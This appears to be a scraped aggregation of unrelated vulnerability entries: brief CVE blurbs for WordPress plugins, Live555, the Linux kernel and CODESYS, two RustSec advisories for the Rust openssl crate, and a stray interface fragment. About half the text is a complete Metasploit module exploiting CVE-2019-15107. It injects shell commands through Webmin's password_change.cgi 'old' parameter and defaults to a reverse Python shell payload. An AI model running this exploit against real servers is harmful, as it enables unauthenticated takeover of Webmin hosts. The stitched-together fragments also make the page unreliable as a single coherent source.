The rsvpmaker plugin before 6.2 for WordPress has SQL injection.

CVE-2019-15646: RSVPMaker

An issue was discovered in the openssl crate before 0.10.9 for Rust. A use-after-free occurs in CMS Signing.

History ⋅ Edit

**RUSTSEC-2018-0010**

Use after free in CMS Signing

Reported

June 1, 2018

Issued

October 2, 2020 (last modified: October 19, 2021)

Package

openssl (crates.io)

Type

Vulnerability

Keywords

#memory-corruption

Aliases

*   CVE-2018-20997

Details

https://github.com/sfackler/rust-openssl/pull/942

CVSS Score

9.8 CRITICAL

CVSS Details

Attack vector

Network

Attack complexity

Low

Privileges required

None

User interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Patched

*   >=0.10.9

Unaffected

*   <0.10.8

**Description**

Affected versions of the OpenSSL crate used structures after they'd been freed.

CVE-2018-20997: Use after free in CMS Signing › RustSec Advisory Database

An issue was discovered in the openssl crate before 0.9.0 for Rust. There is an SSL/TLS man-in-the-middle vulnerability because certificate verification is off by default and there is no API for hostname verification.

**RUSTSEC-2016-0001**

SSL/TLS MitM vulnerability due to insecure defaults

Reported

November 5, 2016

Issued

October 2, 2020 (last modified: October 19, 2021)

Package

openssl (crates.io)

Type

Vulnerability

Keywords

#ssl #mitm

Aliases

*   CVE-2016-10931

Details

https://github.com/sfackler/rust-openssl/releases/tag/v0.9.0

CVSS Score

8.1 HIGH

CVSS Details

Attack vector

Network

Attack complexity

High

Privileges required

None

User interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

CVSS Vector

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Patched

*   >=0.9.0

**Description**

All versions of rust-openssl prior to 0.9.0 contained numerous insecure defaults including off-by-default certificate verification and no API to perform hostname verification.

Unless configured correctly by a developer, these defaults could allow an attacker to perform man-in-the-middle attacks.

The problem was addressed in newer versions by enabling certificate verification by default and exposing APIs to perform hostname verification. Use the SslConnector and SslAcceptor types to take advantage of these new features (as opposed to the lower-level SslContext type).

CVE-2016-10931: SSL/TLS MitM vulnerability due to insecure defaults › RustSec Advisory Database

The cforms2 plugin before 14.6.10 for WordPress has SQL injection.

CVE-2015-9333: cformsII

In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. We, however were not using this by default characteristic of the PropertyUtilsBean.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2019-10086

Live555 before 2019.08.16 has a Use-After-Free because GenericMediaServer::createNewClientSessionWithId can generate the same client session ID in succession, which is mishandled by the MPEG1or2 and Matroska file demultiplexors.

CVE-2019-15232

An issue was discovered in the Linux kernel before 5.2.8. There is a NULL pointer dereference caused by a malicious USB device in the sound/usb/helper.c (motu_microbookii) driver.

CVE-2019-15222

An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.

**Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)**

**Platform:****Linux**

**Date:****2019-08-12**

  

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Webmin 1.920 Unauthenticated RCE',
          'Description'        => %q{
            This module exploits a backdoor in Webmin versions 1.890 through 1.920.
            Only the SourceForge downloads were backdoored, but they are listed as
            official downloads on the project's site.
    
            Unknown attacker(s) inserted Perl qx statements into the build server's
            source code on two separate occasions: once in April 2018, introducing
            the backdoor in the 1.890 release, and in July 2018, reintroducing the
            backdoor in releases 1.900 through 1.920.
    
            Only version 1.890 is exploitable in the default install. Later affected
            versions require the expired password changing feature to be enabled.
          },
          'Author'         => [
            'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
          ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              ['CVE', '2019-'],
              ['URL', 'https://www.pentest.com.tr']
            ],
          'Privileged'     => true,
          'Payload'        =>
            {
              'DisableNops' => true,
              'Space'       => 512,
              'Compat'      =>
                {
                  'PayloadType' => 'cmd'
                }
            },
          'DefaultOptions' =>
            {
              'RPORT' => 10000,
              'SSL'   => false,
              'PAYLOAD' => 'cmd/unix/reverse_python'
            },
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Targets'        => [['Webmin <= 1.910', {}]],
          'DisclosureDate' => 'May 16 2019',
          'DefaultTarget'  => 0)
        )
        register_options [
            OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
        ]
      end
    
      def peer
        "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
      end
      ##
      # Target and input verification
      ##
      def check
        # check passwd change priv
        res = send_request_cgi({
          'uri'     => normalize_uri(target_uri.path, "password_change.cgi"),
          'headers' =>
            {
              'Referer' => "#{peer}/session_login.cgi"
            },
          'cookie'  => "redirect=1; testing=1; sid=x; sessiontest=1"
        })
    
        if res && res.code == 200 && res.body =~ /Failed/
          res = send_request_cgi(
            {
            'method' => 'POST',
            'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
            'ctype'  => 'application/x-www-form-urlencoded',
            'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
            'headers' =>
              {
                'Referer' => "#{peer}/session_login.cgi"
              },
            'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss"        
            })
    
          if res && res.code == 200 && res.body =~ /password_change.cgi/
            return CheckCode::Vulnerable
          else
            return CheckCode::Safe
          end
        else
          return CheckCode::Safe
        end
      end
    
      ##
      # Exploiting phase
      ##
      def exploit
    
        unless Exploit::CheckCode::Vulnerable == check
          fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
        end
    
        command = payload.encoded
        print_status("Attempting to execute the payload...")
        handler
        res = send_request_cgi(
          {
          'method' => 'POST',
          'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
          'ctype'  => 'application/x-www-form-urlencoded',
          'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
          'headers' =>
            {
              'Referer' => "#{peer}/session_login.cgi"
            },
          'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss"
          })
    
      end
    end

CVE-2019-15107: Offensive Security’s Exploit Database Archive

An issue was discovered in 3S-Smart CODESYS V3 products. The application may utilize non-TLS based encryption, which results in user credentials being insufficiently protected during transport. All variants of the following CODESYS V3 products in all versions containing the CmpUserMgr component are affected regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (also part of the CODESYS Development System setup), CODESYS V3 Simulation Runtime (part of the CODESYS Development System), CODESYS Control V3 Runtime System Toolkit, CODESYS HMI V3.

CVE-2019-9013

The events-manager plugin before 5.6 for WordPress has code injection.

Tag

#ssl